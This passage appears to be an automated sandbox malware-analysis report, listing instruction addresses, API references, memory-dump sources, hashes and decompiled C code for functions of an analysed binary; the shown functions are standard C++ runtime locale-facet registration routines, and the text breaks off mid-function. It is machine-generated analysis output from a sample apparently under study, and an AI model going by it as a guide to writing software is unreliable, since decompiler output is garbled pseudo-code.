0x6e1cfb79
0x6e1cfb7b
0x6e1cfb81
0x6e1cfb87
0x6e1cfb8f
0x6e1cfb92
0x6e1cfbcf
0x6e1cfbdd
0x6e1cfbe2
0x6e1cfbea
0x6e1cfbf4
0x6e1cfbf9
0x6e1cfc04
0x6e1cfc08
0x6e1cfc0b
0x6e1cfc10
0x6e1cfc19
0x6e1cfc1b
0x6e1cfc1d
0x6e1cfc62
0x6e1cfc65
0x6e1cfc71
0x6e1cfc1f
0x6e1cfc1f
0x6e1cfc21
0x6e1cfc27
0x6e1cfc2d
0x6e1cfc35
0x6e1cfc38
0x6e1cfc75
0x6e1cfc83
0x6e1cfc88
0x6e1cfc90
0x6e1cfc9a
0x6e1cfc9f
0x6e1cfcaa
0x6e1cfcae
0x6e1cfcb1
0x6e1cfcb6
0x6e1cfcbf
0x6e1cfcc1
0x6e1cfcc3
0x6e1cfd08
0x6e1cfd0b
0x6e1cfd17
0x6e1cfcc5
0x6e1cfcc5
0x6e1cfcc7
0x6e1cfccd
0x6e1cfcd3
0x6e1cfcdb
0x6e1cfcde
0x6e1cfd18
0x6e1cfd1b
0x6e1cfd29
0x6e1cfd2e
0x6e1cfd36
0x6e1cfd3b
0x6e1cfd3d
0x6e1cfd43
0x6e1cfd46
0x6e1cfd4f
0x6e1cfd4f
0x6e1cfd4f
0x6e1cfd53
0x6e1cfd59
0x6e1cfd5c
0x6e1cfd68
0x6e1cfce0
0x6e1cfce0
0x6e1cfce3
0x6e1cfce7
0x6e1cfceb
0x6e1cfcf8
0x6e1cfd00
0x6e1cfd02
0x00000000
0x6e1cfd02
0x6e1cfcc9
0x6e1cfcc9
0x00000000
0x6e1cfcc9
0x6e1cfcc7
0x6e1cfc3a
0x6e1cfc3a
0x6e1cfc3d
0x6e1cfc41
0x6e1cfc45
0x6e1cfc52
0x6e1cfc5a
0x6e1cfc5c
0x00000000
0x6e1cfc5c
0x6e1cfc23
0x6e1cfc23
0x00000000
0x6e1cfc23
0x6e1cfc21
0x6e1cfb94
0x6e1cfb94
0x6e1cfb97
0x6e1cfb9b
0x6e1cfb9f
0x6e1cfbac
0x6e1cfbb4
0x6e1cfbb6
0x00000000
0x6e1cfbb6
0x6e1cfb7d
0x6e1cfb7d
0x00000000
0x6e1cfb7d
0x6e1cfb7b
0x6e1cfaee
0x6e1cfaee
0x6e1cfaf1
0x6e1cfaf5
0x6e1cfaf9
0x6e1cfb06
0x6e1cfb0e
0x6e1cfb10
0x00000000
0x6e1cfb10
0x6e1cfad7
0x6e1cfad7
0x00000000
0x6e1cfad7
0x6e1cfad5
0x6e1cfa48
0x6e1cfa48
0x6e1cfa4b
0x6e1cfa4f
0x6e1cfa53
0x6e1cfa60
0x6e1cfa68
0x6e1cfa6a
0x00000000
0x6e1cfa6a
0x6e1cfa31
0x6e1cfa31
0x00000000
0x6e1cfa31
0x6e1cfa2f
0x6e1cf9a2
0x6e1cf9a2
0x6e1cf9a5
0x6e1cf9a9
0x6e1cf9ad
0x6e1cf9ba
0x6e1cf9c2
0x6e1cf9c4
0x00000000
0x6e1cf9c4
0x6e1cf98b
0x6e1cf98b
0x00000000
0x6e1cf98b
0x6e1cf989
0x6e1cf8fc
0x6e1cf8fc
0x6e1cf8ff
0x6e1cf903
0x6e1cf907
0x6e1cf914
0x6e1cf91c
0x6e1cf91e
0x00000000
0x6e1cf91e
0x6e1cf8e5
0x6e1cf8e5
0x00000000
0x6e1cf8e5
0x6e1cf8e3
0x6e1cf856
0x6e1cf856
0x6e1cf859
0x6e1cf85d
0x6e1cf861
0x6e1cf86e
0x6e1cf876
0x6e1cf878
0x00000000
0x6e1cf878
0x6e1cf83f
0x6e1cf83f
0x00000000
0x6e1cf83f
0x6e1cf83d
0x6e1cf7b0
0x6e1cf7b0
0x6e1cf7b3
0x6e1cf7b7
0x6e1cf7bb
0x6e1cf7c8
0x6e1cf7d0
0x6e1cf7d2
0x00000000
0x6e1cf7d2
0x6e1cf799
0x6e1cf799
0x00000000
0x6e1cf799
0x6e1cf797
0x6e1cf70a
0x6e1cf70a
0x6e1cf70d
0x6e1cf711
0x6e1cf715
0x6e1cf722
0x6e1cf72a
0x6e1cf72c
0x00000000
0x6e1cf72c
0x6e1cf6f3
0x6e1cf6f3
0x00000000
0x6e1cf6f3
0x6e1cf6f1
0x6e1cf664
0x6e1cf664
0x6e1cf667
0x6e1cf66b
0x6e1cf66f
0x6e1cf67c
0x6e1cf684
0x6e1cf686
0x00000000
0x6e1cf686
0x6e1cf64d
0x6e1cf64d
0x00000000
0x6e1cf64d
0x6e1cf64b
0x6e1cf5be
0x6e1cf5be
0x6e1cf5c1
0x6e1cf5c5
0x6e1cf5c9
0x6e1cf5d6
0x6e1cf5de
0x6e1cf5e0
0x00000000
0x6e1cf5e0
0x6e1cf5a7
0x6e1cf5a7
0x00000000
0x6e1cf5a7
0x6e1cf5a5
0x6e1cf518
0x6e1cf518
0x6e1cf51b
0x6e1cf51f
0x6e1cf523
0x6e1cf530
0x6e1cf538
0x6e1cf53a
0x00000000
0x6e1cf53a
0x6e1cf501
0x6e1cf501
0x00000000
0x6e1cf501
0x6e1cf4ff
0x6e1cf472
0x6e1cf472
0x6e1cf475
0x6e1cf479
0x6e1cf47d
0x6e1cf48a
0x6e1cf492
0x6e1cf494
0x00000000
0x6e1cf494
0x6e1cf45b
0x6e1cf45b
0x00000000
0x6e1cf45b
0x6e1cf459

APIs

__EH_prolog3.LIBCMT ref: 6E1CF422
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CF42C
int.LIBCPMT ref: 6E1CF443

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1CF47D
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CF49D
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CF4BB

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 021d7149478ac493dbd06481df323198aa86dfdbc41c2c82b7531e12bc7e7b04
Instruction ID: d6025894efc5a81f61734d93bc2f5a242bd8ad8e34df5f4dbca0ff39fa512ffd
Opcode Fuzzy Hash: 021d7149478ac493dbd06481df323198aa86dfdbc41c2c82b7531e12bc7e7b04
Instruction Fuzzy Hash: BB113A759105198BCF05EBD4CC64AFDB37ABF64B14F240408D120E7290CF789989E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CA24B, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E6E1CA24B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				intOrPtr _v0;
				signed int _v4;
				void* _v16;
				char _v20;
				char _v32;
				void* _t35;
				intOrPtr* _t36;
				void* _t48;
				intOrPtr* _t82;
				intOrPtr* _t92;
				void* _t94;
				void* _t95;

				_t68 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653( &_v20, 0);
				_t94 =  *0x6e286cd0; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t94;
				_t35 = E6E1A161C(0x6e286cbc);
				_t71 = _a8;
				_t36 = E6E1A171B(_a8, _t35);
				_t91 = _t36;
				if(_t36 != 0) {
					L5:
					E6E1C66BA( &_v20);
					return E6E1E0075(_t91);
				} else {
					if(_t94 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6E1CAAA0(__ebx, _t71, __edx, _t91, _t94) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438( &_v32);
							E6E1E3D74( &_v32, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t91, _t94, 0x14);
							E6E1C6653( &_v20, 0);
							_t95 =  *0x6e286cd4; // 0x0
							_v4 = _v4 & 0x00000000;
							_v16 = _t95;
							_t48 = E6E1A161C(0x6e286cc0);
							_t78 = _a8;
							_t92 = E6E1A171B(_a8, _t48);
							__eflags = _t92;
							if(_t92 != 0) {
								L12:
								E6E1C66BA( &_v20);
								return E6E1E0075(_t92);
							} else {
								__eflags = _t95;
								if(_t95 == 0) {
									_push(_a8);
									_push( &_v16);
									__eflags = E6E1CAB08(_t68, _t78, __edx, _t92, _t95) - 0xffffffff;
									if(__eflags == 0) {
										_t82 =  &_v32;
										E6E1A1438(_t82);
										E6E1E3D74( &_v32, 0x6e283504);
										asm("int3");
										_push(_t82);
										 *((intOrPtr*)(_t82 + 4)) = _v0;
										_v16 = _t82;
										 *_t82 = 0x6e22ba24;
										return _t82;
									} else {
										_t92 = _v16;
										_v16 = _t92;
										_v4 = 1;
										E6E1C6FD3(__eflags, _t92);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t92 + 4))))();
										 *0x6e286cd4 = _t92;
										goto L12;
									}
								} else {
									_t92 = _t95;
									goto L12;
								}
							}
						} else {
							_t91 = _v16;
							_v16 = _t91;
							_v4 = 1;
							E6E1C6FD3(__eflags, _t91);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t91 + 4))))();
							 *0x6e286cd0 = _t91;
							goto L5;
						}
					} else {
						_t91 = _t94;
						goto L5;
					}
				}
			}

0x6e1ca24b
0x6e1ca252
0x6e1ca25c
0x6e1ca261
0x6e1ca26c
0x6e1ca270
0x6e1ca273
0x6e1ca278
0x6e1ca27c
0x6e1ca281
0x6e1ca285
0x6e1ca2ca
0x6e1ca2cd
0x6e1ca2d9
0x6e1ca287
0x6e1ca289
0x6e1ca28f
0x6e1ca295
0x6e1ca29d
0x6e1ca2a0
0x6e1ca2dd
0x6e1ca2eb
0x6e1ca2f0
0x6e1ca2f8
0x6e1ca302
0x6e1ca307
0x6e1ca312
0x6e1ca316
0x6e1ca319
0x6e1ca31e
0x6e1ca327
0x6e1ca329
0x6e1ca32b
0x6e1ca370
0x6e1ca373
0x6e1ca37f
0x6e1ca32d
0x6e1ca32d
0x6e1ca32f
0x6e1ca335
0x6e1ca33b
0x6e1ca343
0x6e1ca346
0x6e1ca380
0x6e1ca383
0x6e1ca391
0x6e1ca396
0x6e1ca39a
0x6e1ca39e
0x6e1ca3a3
0x6e1ca3a6
0x6e1ca3ad
0x6e1ca348
0x6e1ca348
0x6e1ca34b
0x6e1ca34f
0x6e1ca353
0x6e1ca360
0x6e1ca368
0x6e1ca36a
0x00000000
0x6e1ca36a
0x6e1ca331
0x6e1ca331
0x00000000
0x6e1ca331
0x6e1ca32f
0x6e1ca2a2
0x6e1ca2a2
0x6e1ca2a5
0x6e1ca2a9
0x6e1ca2ad
0x6e1ca2ba
0x6e1ca2c2
0x6e1ca2c4
0x00000000
0x6e1ca2c4
0x6e1ca28b
0x6e1ca28b
0x00000000
0x6e1ca28b
0x6e1ca289

APIs

__EH_prolog3.LIBCMT ref: 6E1CA252
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CA25C
int.LIBCPMT ref: 6E1CA273

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1CA2AD
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CA2CD
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CA2EB

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: a0b1fcbb406056e7ad3890f12b73dadeb6a155ce36eeea08039bf1fb697cebc6
Instruction ID: 453eca37adad54a19650af7e00fc2c4972c76643a17334e609ef5088bf3b8699
Opcode Fuzzy Hash: a0b1fcbb406056e7ad3890f12b73dadeb6a155ce36eeea08039bf1fb697cebc6
Instruction Fuzzy Hash: B911597591052D8BCF02EBE4C854AFEB37ABF64B14F140808E111E7290DF789984E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF2CF, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6E1CF2CF(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t237;
				signed int _t238;
				void* _t250;
				void* _t263;
				void* _t276;
				void* _t289;
				void* _t302;
				void* _t315;
				void* _t328;
				void* _t341;
				void* _t354;
				void* _t367;
				void* _t380;
				void* _t393;
				void* _t406;
				void* _t419;
				void* _t432;
				signed int _t625;
				signed int _t677;
				signed int _t678;
				signed int _t679;
				signed int _t680;
				signed int _t681;
				signed int _t682;
				signed int _t683;
				signed int _t684;
				signed int _t685;
				signed int _t686;
				signed int _t687;
				signed int _t688;
				signed int _t689;
				signed int _t690;
				signed int _t691;
				signed int _t693;
				signed int _t694;
				signed int _t695;
				signed int _t696;
				signed int _t697;
				signed int _t698;
				signed int _t699;
				signed int _t700;
				signed int _t701;
				signed int _t702;
				signed int _t703;
				signed int _t704;
				signed int _t705;
				signed int _t706;
				signed int _t707;
				signed int _t708;
				signed int _t709;
				void* _t726;

				_t674 = __edx;
				_t513 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t726 - 0x14, 0);
				_t693 =  *0x6e286dec; // 0x0
				 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
				 *(_t726 - 0x10) = _t693;
				_t237 = E6E1A161C(0x6e286d98);
				_t516 =  *((intOrPtr*)(_t726 + 8));
				_t238 = E6E1A171B( *((intOrPtr*)(_t726 + 8)), _t237);
				_t676 = _t238;
				if(_t238 != 0) {
					L5:
					E6E1C66BA(_t726 - 0x14);
					return E6E1E0075(_t676);
				} else {
					if(_t693 == 0) {
						_push( *((intOrPtr*)(_t726 + 8)));
						_push(_t726 - 0x10);
						__eflags = E6E1D0F87(__ebx, _t516, __edx, _t676, _t693) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t726 - 0x20);
							E6E1E3D74(_t726 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t676, _t693, 0x14);
							E6E1C6653(_t726 - 0x14, 0);
							_t694 =  *0x6e286dbc; // 0x0
							 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
							 *(_t726 - 0x10) = _t694;
							_t250 = E6E1A161C(0x6e286d70);
							_t523 =  *((intOrPtr*)(_t726 + 8));
							_t677 = E6E1A171B( *((intOrPtr*)(_t726 + 8)), _t250);
							__eflags = _t677;
							if(_t677 != 0) {
								L12:
								E6E1C66BA(_t726 - 0x14);
								return E6E1E0075(_t677);
							} else {
								__eflags = _t694;
								if(_t694 == 0) {
									_push( *((intOrPtr*)(_t726 + 8)));
									_push(_t726 - 0x10);
									__eflags = E6E1D0FEF(_t513, _t523, __edx, _t677, _t694) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t726 - 0x20);
										E6E1E3D74(_t726 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t513, _t677, _t694, 0x14);
										E6E1C6653(_t726 - 0x14, 0);
										_t695 =  *0x6e286df0; // 0x0
										 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
										 *(_t726 - 0x10) = _t695;
										_t263 = E6E1A161C(0x6e286d9c);
										_t530 =  *((intOrPtr*)(_t726 + 8));
										_t678 = E6E1A171B( *((intOrPtr*)(_t726 + 8)), _t263);
										__eflags = _t678;
										if(_t678 != 0) {
											L19:
											E6E1C66BA(_t726 - 0x14);
											return E6E1E0075(_t678);
										} else {
											__eflags = _t695;
											if(_t695 == 0) {
												_push( *((intOrPtr*)(_t726 + 8)));
												_push(_t726 - 0x10);
												__eflags = E6E1D1057(_t513, _t530, __edx, _t678, _t695) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t726 - 0x20);
													E6E1E3D74(_t726 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t513, _t678, _t695, 0x14);
													E6E1C6653(_t726 - 0x14, 0);
													_t696 =  *0x6e286dc0; // 0x0
													 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
													 *(_t726 - 0x10) = _t696;
													_t276 = E6E1A161C(0x6e286d74);
													_t537 =  *((intOrPtr*)(_t726 + 8));
													_t679 = E6E1A171B( *((intOrPtr*)(_t726 + 8)), _t276);
													__eflags = _t679;
													if(_t679 != 0) {
														L26:
														E6E1C66BA(_t726 - 0x14);
														return E6E1E0075(_t679);
													} else {
														__eflags = _t696;
														if(_t696 == 0) {
															_push( *((intOrPtr*)(_t726 + 8)));
															_push(_t726 - 0x10);
															__eflags = E6E1D10BF(_t513, _t537, _t674, _t679, _t696) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t726 - 0x20);
																E6E1E3D74(_t726 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t513, _t679, _t696, 0x14);
																E6E1C6653(_t726 - 0x14, 0);
																_t697 =  *0x6e286df8; // 0x0
																 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																 *(_t726 - 0x10) = _t697;
																_t289 = E6E1A161C(0x6e286da4);
																_t544 =  *((intOrPtr*)(_t726 + 8));
																_t680 = E6E1A171B( *((intOrPtr*)(_t726 + 8)), _t289);
																__eflags = _t680;
																if(_t680 != 0) {
																	L33:
																	E6E1C66BA(_t726 - 0x14);
																	return E6E1E0075(_t680);
																} else {
																	__eflags = _t697;
																	if(_t697 == 0) {
																		_push( *((intOrPtr*)(_t726 + 8)));
																		_push(_t726 - 0x10);
																		__eflags = E6E1D1127(_t513, _t544, _t674, _t680, _t697) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1A1438(_t726 - 0x20);
																			E6E1E3D74(_t726 - 0x20, 0x6e283504);
																			asm("int3");
																			E6E1E00AC(0x6e2283cf, _t513, _t680, _t697, 0x14);
																			E6E1C6653(_t726 - 0x14, 0);
																			_t698 =  *0x6e286df4; // 0x0
																			 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																			 *(_t726 - 0x10) = _t698;
																			_t302 = E6E1A161C(0x6e286da0);
																			_t551 =  *((intOrPtr*)(_t726 + 8));
																			_t681 = E6E1A171B( *((intOrPtr*)(_t726 + 8)), _t302);
																			__eflags = _t681;
																			if(_t681 != 0) {
																				L40:
																				E6E1C66BA(_t726 - 0x14);
																				return E6E1E0075(_t681);
																			} else {
																				__eflags = _t698;
																				if(_t698 == 0) {
																					_push( *((intOrPtr*)(_t726 + 8)));
																					_push(_t726 - 0x10);
																					__eflags = E6E1D11AB(_t513, _t551, _t674, _t681, _t698) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1A1438(_t726 - 0x20);
																						E6E1E3D74(_t726 - 0x20, 0x6e283504);
																						asm("int3");
																						E6E1E00AC(0x6e2283cf, _t513, _t681, _t698, 0x14);
																						E6E1C6653(_t726 - 0x14, 0);
																						_t699 =  *0x6e286dc8; // 0x0
																						 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																						 *(_t726 - 0x10) = _t699;
																						_t315 = E6E1A161C(0x6e286d7c);
																						_t558 =  *((intOrPtr*)(_t726 + 8));
																						_t682 = E6E1A171B( *((intOrPtr*)(_t726 + 8)), _t315);
																						__eflags = _t682;
																						if(_t682 != 0) {
																							L47:
																							E6E1C66BA(_t726 - 0x14);
																							return E6E1E0075(_t682);
																						} else {
																							__eflags = _t699;
																							if(_t699 == 0) {
																								_push( *((intOrPtr*)(_t726 + 8)));
																								_push(_t726 - 0x10);
																								__eflags = E6E1D1230(_t513, _t558, _t674, _t682, _t699) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1A1438(_t726 - 0x20);
																									E6E1E3D74(_t726 - 0x20, 0x6e283504);
																									asm("int3");
																									E6E1E00AC(0x6e2283cf, _t513, _t682, _t699, 0x14);
																									E6E1C6653(_t726 - 0x14, 0);
																									_t700 =  *0x6e286dc4; // 0x0
																									 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																									 *(_t726 - 0x10) = _t700;
																									_t328 = E6E1A161C(0x6e286d78);
																									_t565 =  *((intOrPtr*)(_t726 + 8));
																									_t683 = E6E1A171B( *((intOrPtr*)(_t726 + 8)), _t328);
																									__eflags = _t683;
																									if(_t683 != 0) {
																										L54:
																										E6E1C66BA(_t726 - 0x14);
																										return E6E1E0075(_t683);
																									} else {
																										__eflags = _t700;
																										if(_t700 == 0) {
																											_push( *((intOrPtr*)(_t726 + 8)));
																											_push(_t726 - 0x10);
																											__eflags = E6E1D12B4(_t513, _t565, _t674, _t683, _t700) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1A1438(_t726 - 0x20);
																												E6E1E3D74(_t726 - 0x20, 0x6e283504);
																												asm("int3");
																												E6E1E00AC(0x6e2283cf, _t513, _t683, _t700, 0x14);
																												E6E1C6653(_t726 - 0x14, 0);
																												_t701 =  *0x6e286dd8; // 0x0
																												 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																												 *(_t726 - 0x10) = _t701;
																												_t341 = E6E1A161C(0x6e286d84);
																												_t572 =  *((intOrPtr*)(_t726 + 8));
																												_t684 = E6E1A171B( *((intOrPtr*)(_t726 + 8)), _t341);
																												__eflags = _t684;
																												if(_t684 != 0) {
																													L61:
																													E6E1C66BA(_t726 - 0x14);
																													return E6E1E0075(_t684);
																												} else {
																													__eflags = _t701;
																													if(_t701 == 0) {
																														_push( *((intOrPtr*)(_t726 + 8)));
																														_push(_t726 - 0x10);
																														__eflags = E6E1D1339(_t513, _t572, _t674, _t684, _t701) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1A1438(_t726 - 0x20);
																															E6E1E3D74(_t726 - 0x20, 0x6e283504);
																															asm("int3");
																															E6E1E00AC(0x6e2283cf, _t513, _t684, _t701, 0x14);
																															E6E1C6653(_t726 - 0x14, 0);
																															_t702 =  *0x6e286db0; // 0x0
																															 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																															 *(_t726 - 0x10) = _t702;
																															_t354 = E6E1A161C(0x6e286d64);
																															_t579 =  *((intOrPtr*)(_t726 + 8));
																															_t685 = E6E1A171B( *((intOrPtr*)(_t726 + 8)), _t354);
																															__eflags = _t685;
																															if(_t685 != 0) {
																																L68:
																																E6E1C66BA(_t726 - 0x14);
																																return E6E1E0075(_t685);
																															} else {
																																__eflags = _t702;
																																if(_t702 == 0) {
																																	_push( *((intOrPtr*)(_t726 + 8)));
																																	_push(_t726 - 0x10);
																																	__eflags = E6E1D13A1(_t513, _t579, _t674, _t685, _t702) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1A1438(_t726 - 0x20);
																																		E6E1E3D74(_t726 - 0x20, 0x6e283504);
																																		asm("int3");
																																		E6E1E00AC(0x6e2283cf, _t513, _t685, _t702, 0x14);
																																		E6E1C6653(_t726 - 0x14, 0);
																																		_t703 =  *0x6e286ddc; // 0x0
																																		 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																																		 *(_t726 - 0x10) = _t703;
																																		_t367 = E6E1A161C(0x6e286d88);
																																		_t586 =  *((intOrPtr*)(_t726 + 8));
																																		_t686 = E6E1A171B( *((intOrPtr*)(_t726 + 8)), _t367);
																																		__eflags = _t686;
																																		if(_t686 != 0) {
																																			L75:
																																			E6E1C66BA(_t726 - 0x14);
																																			return E6E1E0075(_t686);
																																		} else {
																																			__eflags = _t703;
																																			if(_t703 == 0) {
																																				_push( *((intOrPtr*)(_t726 + 8)));
																																				_push(_t726 - 0x10);
																																				__eflags = E6E1D1409(_t513, _t586, _t674, _t686, _t703) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1A1438(_t726 - 0x20);
																																					E6E1E3D74(_t726 - 0x20, 0x6e283504);
																																					asm("int3");
																																					E6E1E00AC(0x6e2283cf, _t513, _t686, _t703, 0x14);
																																					E6E1C6653(_t726 - 0x14, 0);
																																					_t704 =  *0x6e286de0; // 0x0
																																					 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																																					 *(_t726 - 0x10) = _t704;
																																					_t380 = E6E1A161C(0x6e286d8c);
																																					_t593 =  *((intOrPtr*)(_t726 + 8));
																																					_t687 = E6E1A171B( *((intOrPtr*)(_t726 + 8)), _t380);
																																					__eflags = _t687;
																																					if(_t687 != 0) {
																																						L82:
																																						E6E1C66BA(_t726 - 0x14);
																																						return E6E1E0075(_t687);
																																					} else {
																																						__eflags = _t704;
																																						if(_t704 == 0) {
																																							_push( *((intOrPtr*)(_t726 + 8)));
																																							_push(_t726 - 0x10);
																																							__eflags = E6E1D1471(_t513, _t593, _t674, _t687, _t704) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E1A1438(_t726 - 0x20);
																																								E6E1E3D74(_t726 - 0x20, 0x6e283504);
																																								asm("int3");
																																								E6E1E00AC(0x6e2283cf, _t513, _t687, _t704, 0x14);
																																								E6E1C6653(_t726 - 0x14, 0);
																																								_t705 =  *0x6e286dfc; // 0x0
																																								 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																																								 *(_t726 - 0x10) = _t705;
																																								_t393 = E6E1A161C(0x6e286da8);
																																								_t600 =  *((intOrPtr*)(_t726 + 8));
																																								_t688 = E6E1A171B( *((intOrPtr*)(_t726 + 8)), _t393);
																																								__eflags = _t688;
																																								if(_t688 != 0) {
																																									L89:
																																									E6E1C66BA(_t726 - 0x14);
																																									return E6E1E0075(_t688);
																																								} else {
																																									__eflags = _t705;
																																									if(_t705 == 0) {
																																										_push( *((intOrPtr*)(_t726 + 8)));
																																										_push(_t726 - 0x10);
																																										__eflags = E6E1D14EC(_t513, _t600, _t674, _t688, _t705) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6E1A1438(_t726 - 0x20);
																																											E6E1E3D74(_t726 - 0x20, 0x6e283504);
																																											asm("int3");
																																											E6E1E00AC(0x6e2283cf, _t513, _t688, _t705, 0x14);
																																											E6E1C6653(_t726 - 0x14, 0);
																																											_t706 =  *0x6e286dcc; // 0x0
																																											 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																																											 *(_t726 - 0x10) = _t706;
																																											_t406 = E6E1A161C(0x6e286d80);
																																											_t607 =  *((intOrPtr*)(_t726 + 8));
																																											_t689 = E6E1A171B( *((intOrPtr*)(_t726 + 8)), _t406);
																																											__eflags = _t689;
																																											if(_t689 != 0) {
																																												L96:
																																												E6E1C66BA(_t726 - 0x14);
																																												return E6E1E0075(_t689);
																																											} else {
																																												__eflags = _t706;
																																												if(_t706 == 0) {
																																													_push( *((intOrPtr*)(_t726 + 8)));
																																													_push(_t726 - 0x10);
																																													__eflags = E6E1D1558(_t513, _t607, _t674, _t689, _t706) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6E1A1438(_t726 - 0x20);
																																														E6E1E3D74(_t726 - 0x20, 0x6e283504);
																																														asm("int3");
																																														E6E1E00AC(0x6e2283cf, _t513, _t689, _t706, 0x14);
																																														E6E1C6653(_t726 - 0x14, 0);
																																														_t707 =  *0x6e286e00; // 0x0
																																														 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																																														 *(_t726 - 0x10) = _t707;
																																														_t419 = E6E1A161C(0x6e286dac);
																																														_t614 =  *((intOrPtr*)(_t726 + 8));
																																														_t690 = E6E1A171B( *((intOrPtr*)(_t726 + 8)), _t419);
																																														__eflags = _t690;
																																														if(_t690 != 0) {
																																															L103:
																																															E6E1C66BA(_t726 - 0x14);
																																															return E6E1E0075(_t690);
																																														} else {
																																															__eflags = _t707;
																																															if(_t707 == 0) {
																																																_push( *((intOrPtr*)(_t726 + 8)));
																																																_push(_t726 - 0x10);
																																																__eflags = E6E1D15C4(_t513, _t614, _t674, _t690, _t707) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6E1A1438(_t726 - 0x20);
																																																	E6E1E3D74(_t726 - 0x20, 0x6e283504);
																																																	asm("int3");
																																																	E6E1E00AC(0x6e2283cf, _t513, _t690, _t707, 0x14);
																																																	E6E1C6653(_t726 - 0x14, 0);
																																																	_t708 =  *0x6e286dd0; // 0x0
																																																	 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																																																	 *(_t726 - 0x10) = _t708;
																																																	_t432 = E6E1A161C(0x6e286d60);
																																																	_t621 =  *((intOrPtr*)(_t726 + 8));
																																																	_t691 = E6E1A171B( *((intOrPtr*)(_t726 + 8)), _t432);
																																																	__eflags = _t691;
																																																	if(_t691 != 0) {
																																																		L110:
